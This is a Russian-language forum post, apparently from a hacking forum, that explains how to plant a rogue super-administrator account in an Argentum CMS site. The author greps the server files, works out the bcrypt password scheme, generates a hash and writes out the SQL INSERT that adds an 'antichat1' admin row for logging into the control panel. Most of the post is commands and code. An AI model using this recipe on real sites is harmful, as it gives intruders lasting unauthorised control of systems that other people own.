Тема: Argentum CMS
Показать сообщение отдельно

  #5  
Старый 09.06.2015, 16:52
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
я сначала начал искать по файлам всяческими find и grep, а потом все же решил перепроверить.

есть там такая таблица: sf_admin_user, в ней такие колонки:

Код:
id    group_id    username    password    full_name    email    created_at    last_activity    is_active    is_super_admin
так вот в cpanel пускает, если is_super_admin = 1.

пароли там через функцию http://php.net/manual/ru/function.password-hash.php

ищем файл:

Код:
grep --exclude=*.o -rnw '/var/www/***/' -e "PASSWORD_BCRYPT"
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:12:    define('PASSWORD_BCRYPT', 1);
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:13:    define('PASSWORD_DEFAULT', PASSWORD_BCRYPT);
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:38:            case PASSWORD_BCRYPT:
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:159:            $return['algo'] = PASSWORD_BCRYPT;
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:184:            case PASSWORD_BCRYPT:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]switch ([/COLOR][COLOR="#0000BB"]$algo[/COLOR][COLOR="#007700"]) {
 case[/COLOR][COLOR="#0000BB"]PASSWORD_BCRYPT[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]$cost[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cost'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cost'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"];
 if ([/COLOR][COLOR="#0000BB"]$cost[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'options'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'cost'[/COLOR][COLOR="#007700"]]) {
 return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];[/COLOR][/COLOR
bcrypt, cost = 10

генерируем пасс себе

Код:
 10,
];
echo password_hash("pass", PASSWORD_BCRYPT, $options)."\n";
?>
$2a$10$Fnz2ze0gI7SYofxsluTrluK3GEQiFGS2Oy4kEbBo816 yEvRWHFGKS

добавим себя в базу:

Код:
INSERT INTO sf_admin_user (id, group_id, username, password, full_name, email, created_at, last_activity, is_active, is_super_admin) VALUES (667, 1, "antichat1", "$2a$10$Fnz2ze0gI7SYofxsluTrluK3GEQiFGS2Oy4kEbBo816yEvRWHFGKS", "lol1", "lol@lol.ru1", "2010-10-10 17:29:54", "2013-04-05 22:05:38", 1, 1);
готово, логинимся: ***/cpanel/
 
Ответить с цитированием